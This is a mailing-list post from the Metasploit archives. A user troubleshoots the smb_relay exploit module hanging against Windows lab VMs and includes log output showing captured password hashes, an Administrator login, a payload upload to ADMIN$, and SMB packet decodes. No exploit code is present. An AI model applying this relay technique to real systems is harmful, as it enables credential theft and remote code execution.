Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Issue with smb_relay

From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Thu, 20 Nov 2008 23:49:06 +0100
        Hello,

I have an issue with smb_relay module.

My configuration is the following:
- Attacker = Ubuntu 8.04 with either framework 3.2-rel or 3.3-svn.
- Victim = either Windows 2000 SP4 or Windows 2003 SP2 "out of the box"
virtual machines (French versions of Windows).

I tried all framework/victim combinations, but none worked. Plugin
output is:
------------------------------------------------------------------
21:12:46 - Initialized the Metasploit Framework GUI.
21:14:24 - smb_relay [*] Launching exploit windows/smb/smb_relay...
21:14:25 - smb_relay [*] Server started.
21:14:30 - smb_relay [*] Received 192.168.0.129:1033
TEST2K3\Administrator
LMHASH:9c69c0a7006c4b69ebdf16cdbd78d62abc1d6dc8cc6ef82b
NTHASH:9c69c0a7006c4b69ebdf16cdbd78d62abc1d6dc8cc6ef82b OS:Windows
Server 2003 R2 3790 Service Pack 2 LM:
21:14:30 - smb_relay [*] Authenticating to 192.168.0.129 as
TEST2K3\Administrator...
21:14:30 - smb_relay [*] AUTHENTICATED as TEST2K3\Administrator...
21:14:30 - smb_relay [*] Connecting to the ADMIN$ share...
21:14:30 - smb_relay [*] Regenerating the payload...
21:14:30 - smb_relay [*] Uploading payload...
21:14:30 - smb_relay [*] Created \KiTOBqaK.exe...
21:14:30 - smb_relay [*] Connecting to the Service Control Manager...
------------------------------------------------------------------

At this point, the binary file has been successfully uploaded on the
victim. Then the module goes into infinite looping while communicating
with the SCM. It seems that both keep exchanging SMB packets with
0-sized payload (packets dumped below).

PS. It tried the SOMBI stuff also (mentioned before on this list), but I
failed to see how that stuff could be more than a "proof of concept".

Regards,
- Nicolas RUFF

#1 192.168.0.128 -> 192.168.0.129
SMB      Read AndX Request, FID: 0x4001, 0 bytes at offset 186

SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        [Response in: 236]
        SMB Command: Read AndX (0x2e)
        Error Class: Success (0x00)
        Reserved: 00
        Error Code: No Error
        Flags: 0x18
        Flags2: 0x2001
        Process ID High: 0
        Signature: 0000000000000000
        Reserved: 0000
        Tree ID: 2049
        Process ID: 61626
        User ID: 2048
        Multiplex ID: 3431
    Read AndX Request (0x2e)
        Word Count (WCT): 10
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        FID: 0x4001
        Offset: 186
        Max Count Low: 0
        Min Count: 0
        [File Offset: 186]
        [File RW Length: 0]
        Remaining: 0
        Byte Count (BCC): 0

#2 192.168.0.129 -> 192.168.0.128
SMB      Read AndX Response, 0 bytes

SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        [Response to: 235]
        [Time from request: 0.000436000 seconds]
        SMB Command: Read AndX (0x2e)
        Error Class: Success (0x00)
        Reserved: 00
        Error Code: No Error
        Flags: 0x98
        Flags2: 0x2001
        Process ID High: 0
        Signature: 0000000000000000
        Reserved: 0000
        Tree ID: 2049
        Process ID: 61626
        User ID: 2048
        Multiplex ID: 3431
    Read AndX Response (0x2e)
        Word Count (WCT): 12
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        [File Offset: 186]
        [File RW Length: 0]
        Remaining: 0
        Data Compaction Mode: 0
        Reserved: 0000
        Data Length Low: 0
        Data Offset: 0
        Data Length High (multiply with 64K): 0
        Reserved: 000000000000
        Byte Count (BCC): 0
Previous By Date Next
Previous By Thread Next

Current thread: